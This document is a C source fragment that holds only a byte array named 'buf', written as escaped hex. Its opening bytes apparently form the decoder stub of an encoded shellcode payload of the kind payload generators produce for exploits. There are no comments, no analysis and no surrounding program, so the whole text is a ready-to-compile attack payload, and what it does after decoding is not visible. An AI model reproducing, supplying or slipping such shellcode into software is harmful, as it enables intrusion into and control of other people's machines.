unsigned char buf[] = 
"\xbe\x3b\xd3\xf8\x85\xdb\xc9\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\xbd\x31\x77\x13\x03\x77\x13\x83\xc7\x3f\x31\x0d\x5f\xe7\x0d"
"\xb2\xd5\x58\xd5\x92\x62\x42\xdd\x7e\xba\x43\xac\x37\x8d\x10"
"\xd6\xb4\x2d\x92\xeb\xf9\xa4\x24\xab\x0f\xa3\x70\x8c\xc1\x6b"
"\x12\xa3\x1c\x27\xfc\xf4\xd2\x95\xbf\x43\x2d\x15\x15\x50\x4e"
"\xef\xbe\x14\x65\xc3\xbc\xf0\xfb\x6b\xda\x2b\xd7\xd4\x17\xc7"
"\x45\xc9\x52\x05\x3c\x40\xc2\x12\xbc\x73\x72\xcd\x98\xb9\x63"
"\xa1\xbd\x4f\x5a\xfe\x09\xba\x29\x32\x29\xc3\xd0\xdd\x5e\x4f"
"\xe2\x42\x59\xd8\x5f\x29\xb0\xa3\x97\x94\x08\xeb\xb5\x17\x3d"
"\x0b\x4c\x29\x90\x57\x8b\xfc\xda\x49\x29\x38\xb9\x79\xe0\x63"
"\x06\x41\x30\xab\x1a\xd3\xcd\xf9\x11\xf6\x53\x9d\xa0\x61\xf0"
"\x2f\x25\xa7\xea\x50\xd4\xba\x59\x48\x92\x38\xb4\x33\x13\x65"
"\x4b\x31\x40\xb0\x4c\x68\x37\xde\x65\x34\x62\x6f\xa5\x8e\x41"
"\x75\x5f\xdb\x6b\x49\xbb\x88\x8b\x67\x5b\x12\x20\x4f\xfb\x7f"
"\xae\x7b\xcb\x42\x62\xb3\x16\xa6\xd0\xf4\xe6\x80\xbf\x78\xf3"
"\x46\xaa\x35\x10\xe7\x0f\x48\xdc\x5e\x60\xd1\x8c\x35\x90\x13"
"\x4b\xcf\x97\xcb\x04\x42\xa4\xac\x9c\xb9\x23\x67\xca\x6a\xb2"
"\x90\x6e\xfa\xdb\xb2\xac\xa3\x92\x2b\xa4\x76\xe6\xcf\xd1\x55"
"\xb7\xfc\x44\x6e\xa0\x76\x3b\xe5\x4e\x35\xee\x72\xc7\xda\x95"
"\x42\x65\xf1\x89\xc1\xcc\x7d\x61\xb2\x5d\xf3\xc3\x2d\x33\x10"
"\xc6\x47\x76\x99\xec\xd9\xc0\x19\xf8\x79\x5f\x21\x59\xc0\xbf"
"\x95\xf9\xd2\x93\xba\xed\xd1\xb0\xf6\xf5\x38\xab\x4d\x82\x88"
"\xd7\x3e\x0c\x5e\x7f\xa8\xba\x30\x60\x86\xd6\xd0\x10\xca\x6f"
"\xc1\x55\x10\x12\x6e\x44\x97\x27\xba\xb4\xd8\xc8\x60\x60\x21"
"\x96\xbc\x86\x3b\x4b\xa0\x4c\x7d\xd0\x7b\xe2\x77\xa7\x87\x56"
"\xc7\x1b\x74\x2c\x25\x9d\xeb\x4a\x33\x1c\xdf\xe7\x96\x5a\x0a"
"\xee\xcb\x3e\xe9\xf2\xcc\x1f\x5a\x06\x24\xa3\x7d\x20\x8d\x3c"
"\xd6\x7f\x61\x0b\x92\x9d\x62\x93\x20\x8a\x02\xf0\xd0\xa8\xc9"
"\x71\xb1\xca\x15\xd2\xec\x1f\xf0\xd6\x6c\x4a\x5d\xe5\x68\x75"
"\x82\x6f\xfd\xea\x62\xc3\xe9\x80\xf7\xc7\x40\x32\x42\x75\xb7"
"\xe7\xb2\xa3\x92\x8f\x20\xd7\x39\x80\xee\x1b\xdc\x03\x04\x6c"
"\xea\x9e\x5c\xeb\x36\x10\xf8\xca\xa8\x8d\xfc\x79\xf2\x9e\xeb"
"\xb5\x2c\x86\x12\xc0\x77\x14\x25\x36\x5d\xc0\xe0\x12\x86\x37"
"\xa6\x77\xdc\x81\x37\x00\x81\x28\xc2\x2e\xe0\x5e\xeb\xff\x0f"
"\xb4\x12\xf1\xd5\x0c\x9f\x8e\xf5\x13\xa7\x81\x79\x5e\x2f\xdc"
"\x64\x15\xe9\x9d\xcd\xae\x2e\xe0\x71\x55\xc8\x5a\x11\x5b\xc6"
"\xb8\x5d\x60\x8b\x88\x8d\x3f\xe4\x6b\x98\xcb\x5f\x55\x10\xd3"
"\x00\xf9\x7d\x27\xa8\x0e\x24\x61\x41\x9d\xb7\xfe\xae\x5f\x67"
"\xcb\x0d\x4c\x82\xe4\xb7\x02\x92\xf5\xd8\x16\xcc\x3b\x68\x8e"
"\x6d\x2e\x52\xae\xe7\x8b\xb2\x37\x05\xd5\x77\x1d\x7d\xc5\x18"
"\xd3\x55\x96\x1a\x05\x0c\xcc\xcd\x14\xef\x56\xd1\xa3\x4e\xbd"
"\x79\x3f\x21\x0e\x66\x75\xc9\x4e\xad\xf2\xc9\x1a\x5e\xd9\xe2"
"\x64\xc5\x33\xec\x57\xfc\x8c\x6a\x6e\x1b\x9f\xb5\xfd\xb4\x45"
"\x8e\x63\x4c\xee\xa4\xd3\x52\x03\x0f\x7e\x03\x29\x7e\xd8\xdb"
"\x6c\x4e\x2c\x6d\x52\x09\x42\xc4\xa7\x04\x7a\x04\x7f\xae\xc9"
"\x4f\xdc\x3a\x79\x63\x11\x6a\x6b\xb1\xc3\x7e\x39\x4c\x59\x6e"
"\x3d\x58\x15\xd5\x33\x5c\xfc\x44\x0f\x59\x27\x13\x1e\xd9\x71"
"\xef\x42\xf3\x29\x51\x00\x36\xa9\x79\x97\x13\xd3\x4b\xc6\xdf"
"\x07\x0b\x84\xe8\x3d\xe0\xe6\xfd\x9c\x68\x6e\x98\xd9\xb6\x97"
"\xdf\x1c\xa1\x31\x47\x09\x51\x65\x96\x07\x1d\xed\xe9\x32\xf8"
"\x89\x17\xe4\x34\x44\xf4\x50\xfe\xe0\xb6\xbe\xa2\x21\x07\x59"
"\x6d\x53\xa3\x58\xbf\x33\x65\x80\xaf\xcd\x2d\x6b\xe6\x35\xcc";